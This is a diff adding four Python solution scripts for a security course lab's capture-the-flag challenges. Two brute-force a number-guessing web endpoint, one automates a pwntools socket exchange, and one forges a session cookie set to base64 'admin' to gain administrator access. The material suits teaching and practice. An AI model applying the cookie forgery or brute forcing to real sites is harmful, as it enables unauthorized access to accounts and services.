Lab2

pa/lab2/chall_guess_big_number.py

@@ -0,0 +1,23 @@
+from requests import Session
+
+BASE = "http://mustard.stt.rnl.tecnico.ulisboa.pt:25052"
+sesh = Session()
+
+resp = sesh.get(BASE+"/")
+content = resp.content.decode('utf-8')
+
+top = 100000
+bot = 1
+
+while top - bot > 1:
+	guess = int((top + bot) / 2)
+	resp = sesh.get(BASE+"/number/"+str(guess))
+	content = resp.content.decode('utf-8')
+	print(guess, content)
+	if "SSof" in content:
+		break
+	elif "Higher" in content:
+		bot = guess
+	else:
+		top = guess
+

pa/lab2/chall_guess_number.py

@@ -0,0 +1,15 @@
+from requests import Session
+
+BASE = "http://mustard.stt.rnl.tecnico.ulisboa.pt:25051"
+sesh = Session()
+
+resp = sesh.get(BASE+"/")
+content = resp.content.decode('utf-8')
+
+for guess in range(1,1000):
+	resp = sesh.get(BASE+"/number/"+str(guess))
+	content = resp.content.decode('utf-8')
+	if "SSof" in content:
+		break
+
+	print(guess, content)

pa/lab2/chall_pwntools_sockets.py

@@ -0,0 +1,20 @@
+from pwn import *
+
+HOST = "mustard.stt.rnl.tecnico.ulisboa.pt"
+PORT = 25055
+
+conn = remote(HOST, PORT)
+line = conn.recvline_contains(b"until").decode('utf-8')
+
+target = line[54:-1]
+current = "0"
+print("Target:", target)
+
+while target != current:
+	conn.send(b"MORE\n")
+	new = conn.recvline_contains(b"Here you have").decode('utf-8')[15:]
+	current = str(int(current) + int(new))
+	print("New:", new, "Current:", current)
+
+conn.send(b"FINISH\n")
+print(conn.recvall().decode('utf-8'))

pa/lab2/chall_secure.py

@@ -0,0 +1,22 @@
+from requests import Session
+
+BASE = "http://mustard.stt.rnl.tecnico.ulisboa.pt:25056"
+sesh = Session()
+
+resp = sesh.get(BASE+"/")
+content = resp.content.decode('utf-8')
+print(content)
+
+resp = sesh.post(BASE+"/", data={"username": "admin"})
+content = resp.content.decode('utf-8')
+print(content)
+print(sesh.cookies)
+
+for c in sesh.cookies:
+	if c.name == "user":
+		c.value = "YWRtaW4="
+
+resp = sesh.get(BASE+"/")
+content = resp.content.decode('utf-8')
+print(content)
+print(sesh.cookies)